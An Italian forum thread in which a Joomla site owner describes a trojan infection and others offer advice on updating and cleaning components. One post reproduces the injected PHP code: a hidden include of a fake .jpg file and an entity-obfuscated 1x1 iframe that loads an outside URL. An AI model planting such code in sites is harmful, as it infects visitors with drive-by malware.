sito infetto da un trojan

[frank69]

Ciao a tutti

ho un sito fatto in joomla 1.0 con i moduli virtuemart e zoomgallery e mi sono beccato un virus un bel trojan credo

appena mi sono collegato la prima volta

http://concorso.charliecosmesi.it/ecommerce/ sito pulito

l'antivirus sul mio pc ha rilevato il trojan
Trojan-Clicker.html.IFrame.od

poi non ha rilevato piu niente
ma il sito e sempre bloccato non si collega piu

come faccio per toglierlo se è lui e come faccio
a fare una scansione del sito cosa mai fatta
che antivirus si usa i soliti oppure qualcuno in particolare

ciao e grazie

[sali40]

dovresti vedere se ci sono su dei file che non dovrebbero esserci e se i file del core sono stati modificati. L'hoster dovrebbe poterti aiutare

[frank69]

ok risolto

non so se puo servire a qualcuno sto trojan aveva modificato tutti i file php inserendo all'inizio e alla fine questo codice

<?php

   error_reporting(0);

   if (file_exists("/web/htdocs/concorso.charliecosmesi.it/home/votazione/albums/userpics/10001/45563131x.jpg")) {

   include("/web/htdocs/concorso.charliecosmesi.it/home/votazione/albums/userpics/10001/45563131x.jpg");

   } else

   if (ini_get("register_globals")) {

      if($GLOBALS["fx"]==0) {

         $GLOBALS["fx"]=1;

         echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";

      }

   } else {

      echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";

   }

   ?>

e anche inserendelo alla fine di tutti i file html e piu un paio di immagine che io non avevo mai messo. per risolvere il problema basta guardare la data dei file cambiati e modificare il codice riportandolo com'era prima

ciao ciao

[tommy74]

ciao .. ho avuto lo stesso problema con il componente AJAX Shoutbox Version: 1.2 ... che ho disinstallato ..
vorrei capire se questi virus sono presenti già quando si installa il componente (vedi componenti scaricati da siti non ufficiali) oppure se vengono iniettati a posteriori ..
inoltre la responsabilità è del componenete bucato o dell'hosting che ospita il sito ?

[wolfabrizio]

ciao .. ho avuto lo stesso problema con il componente AJAX Shoutbox Version: 1.2 ... che ho disinstallato ..
vorrei capire se questi virus sono presenti già quando si installa il componente (vedi componenti scaricati da siti non ufficiali) oppure se vengono iniettati a posteriori ..
inoltre la responsabilità è del componenete bucato o dell'hosting che ospita il sito ?

Ti rispondo io così rispondo anche all'altro topic che ti riguarda.
Riguardo alle responsabilità... come si dice... la colpa nasce orfana 
A parte gli scherzi, dipende dal tipo di intrusione che si riceve e se avviene dal proprio sito o dal server, a sua volta magari da un'altro sito.
La principale via di ingresso sono i componenti, e raramente il core, che possono essere violati.
E' importantissimo, anzi di più  , mantenere l'aggiornamento di Joomla e dei componenti utilizzati, tenete sempre d'occhio con una certa assiduità i forum vari su joomla nelle sezioni che parlano di sicurezza.( a proposito nel primo post vedo un "joomla 1.0", voglio sperare che sia un errore di battitura altrimenti è già andata bene ... )
Un mancato aggiornamento, associato magari ad una scarsa attenzione da parte dell'hoster può causare il down completo di un server e di buona parte dei domini ospitati.
Ecco perché è sempre bene fare tre cose:
-Tenere aggiornato tutto
-Tenere aggiornato tutto
-Tenere aggiornato tutto 
... e se non cisono aggiornamenti  : DISINTALLARE 
---
Per quanto riguarda l'altro topic, per controllare il sito di Tommy74 ho semplicemente utilizzato FF con NoScript, evidenziato con il cursore la parte da prima dell'icona di NS a qualche parola dopo, tasto destro sopra, "Visualizza sorgente selezione" copiato l'URL e spippolato  un po' con una nuova sessione di FF.

Ciauz e buon lavoro/divertimento  a tutti 
Wolfab

[tommy74]

grazie ... aggiorno sempre tutti i componenti con cura maniacale !!
... in effetti AJAX Shoutbox Version: 1.2 non viene aggiornato dai realizzatori da quasi un anno..